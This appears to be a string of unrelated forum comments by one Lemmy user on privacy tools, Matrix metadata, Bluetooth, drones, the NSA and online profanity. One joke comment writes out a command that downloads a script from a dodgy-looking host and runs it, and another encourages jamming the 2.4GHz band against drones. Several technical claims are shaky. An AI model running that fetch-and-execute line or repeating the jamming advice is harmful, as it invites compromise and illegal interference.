Just something to keep in mind for those not in the security space. When a security company does an audit, its generally a checklist of commercial and custom security software along with a couple people poking around looking for more manual harder to find stuff. But there’s a reason companies like Mullvad have a bug bounty program… Just because cure53 didn’t find it, it doesn’t mean some bored hacker won’t…

Absolutely better than nothing though.

This should have been much more well thought out The wording, image, buttons, specific wording for each page.

They really screwed the pooch.

Another 4-6 months minimum before release. But quarterly numbers must be met.

Good stuff. Not thought about enough. GPS spoofing random routes also.

Do a lot of reading. Get a cyber informations systems basics overview on your own self-teaching before you try to understand it all.

Stay away from session and matrix. Signal, Nostr, SimpleX (nvm if you use Apple products) and the like are okay, but they are all hobbyist influencable products besides Signal which gets fat government grants and just happens to use the same encryption standards as all other huge name E2EE tools.

Stuff is fun to learn on, but get a good VPN (debates about… mullvad, ivpn, cryptostorm seem okay). here’s something fun for you and free: https://www.thc.org/segfault/

Then maybe you’re okay.

A number of people can see your IP, people will chime in and add to ane remove from this list:

Can’t see it:

• Random people you personal message with
• Random people you chat with in rooms

CAN see it:

• Server admins
• People you share (send/rcv files with) // this may have been fixed
• People who send you links and you click them, but this isn’t specific to Matrix, it’s a tale as old as time.
• You voice call with someone (may have been fixed)

Some info may be wrong. But having someone’s IP in the days of routers and all filtered ports means little, unless you piss off someone who knows some low level customer support person @ your ISP to pay to get your account info. Or you’re dealing drugs in which case use TAILS and stop fucking with technologies you don’t know the specifics of.

If they knock you offline and you can’t access anything at all, unplug your router AND MODEM (most importantly your modem) for an hour. Go touch grass for an hour. Widdle a wee branch. Plus your boxes back in and you’ll be bright as new.

@possiblylinux127@lemmy.zip this isn’t meant to be a dig at you, although last time you didn’t care to correct or learn if I recall,but often times you leave out the “if so,” “possibly, what and XYZ?'” and it ends up spreading misinformation because you didn’t know enough or care enough to type enough.

I love Matrix but we need to be open about what the fish is before skinning it…

https://gist.github.com/maxidorius/5736fd09c9194b7a6dc03b6b8d7220d0

https://blog.erethon.com/blog/2022/07/13/what-a-malicious-matrix-homeserver-admin-can-do/

https://www.reddit.com/r/PrivacyGuides/comments/q7qsty/is_matrix_still_a_metadata_disaster/

Just to confirm the obvious. Downvotes are expected but OP you should read this.

They are close enough to see that they are quad copters, and they make a buzzing noise, correct?

There have been a lot of UAP flaps where the objects (not quad copter looking) will fly low over the countryside, just above the tree-lines to much higher. They usually make no noise aside from reports of static or screeching or electronic interference.

Unlikely to be the case but if so, report to your countries MUFON type department and get as much evidence (video with sound, drawings, time and date, etc) as you can.

There is something else out there, whether it’s military black projects mapping areas or what have you, and it needs to be documented.

If it is for sure quad copter drones, you can get a device to blast the 2.4Ghz spectrum for a short time and make them ‘phone home’ and the operators will stop flying them over your property once they realize something wrong keeps happening when they do. Legality varies.

Many tutorials available to DIY. You can also buy them pre-built, just more expensive.

wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh

was I not supposed to do that? but staxoverflown said it’s OK.

That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.

I’m just surprised and curious and never got a satisfying answer.

Honeypot? Dunno. Good discussions about it on hacker news.

GPG/PGP turns takes the file and turns it into random bits that only someone with the private key can unrandomize. There is no file metadata left. There is no nothing left. I believe the sizes are even consistent (0-1024kB files will be the same output size.)

That’s true, there is the Scunthorpe problem. I guess we’re just doing another 20 year cycle like we have for all of civilization. If someone centuries in the future finds this comment chain, please name the solution to your 20 year repeating fractal math problem something like the CockSyn Solution. I want to be like Shadow from American Gods. Or more accurately like Pythagoras with his stealing murder cult.

I have no idea what this is but I don’t like it and you should feel bad.

This is both a primally philosophical and a pointed statement, but I mean the latter.

And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

Can any late teen-early 20s armchair philosophers once-over this for me?

I have a theory. Never before on the internet (going on 30 years of it) have I seen so many curses used but not fully spelled out (‘f*ck’ for example).

I believe the change has to do with social media and specifically short-form video apps (Tiktok, IG Reels, Youtube Shorts) - not all of which I am familiar with, but I know at least YT and I believe TT does as well. When curse words or words like rape and murder are used in text (or ‘subtitle’ text on screen) the video reach can be penalized in some way. I assume it’s similar in comments.

So you have a ton of the younger generation consuming hours each day of censored curse words, and in their mind it becomes just what you’re supposed to do, socially. They end up doing it with each other over text, and consequently in comments. I have a younger co-worker who will gladly say “F*ck that dude hes a b*tch” in group chat, and when I asked him why he doesn’t just say the words he’s using, he said “I just don’t like to curse.” Which makes no sense to me, as it’s the same word and intent.

I know some Lemmy instances will remove words, but generally only ‘bitch’ and derogatory slur words.

So I hypothesise it’s simply unexamined social conditioning, where they see their peers doing it so they do it too, never questioning why.

https://www.thc.org/segfault/

You can’t with privacy.com or other big services, but there are other services that let you either generate a no-KYC reloadable credit card, or buy a prepaid international card that works for almost everything.

Just don’t run an exit node? We need more guard and relay nodes anyway. I fail to see the issue.

Chances are this is a kid or NEET and all his friend wants is a super simple website with basic info for his local business. Dad is either doing him a favor, or giving him some pocket change so he’ll stop bothering him for money for a month. This is what happens when you don’t teach your children to be adults, and give them everything instead. Seen it too many times.

Based on this interaction alone and his dad deciding the price for him, I’m going to make the wildly assumptious assumption this is a 20s/30s(/40s?) unemploymed guy living at his dad’s house rent free.

If my assumptions are incorrect, sorry mate, you did not win the dad lottery.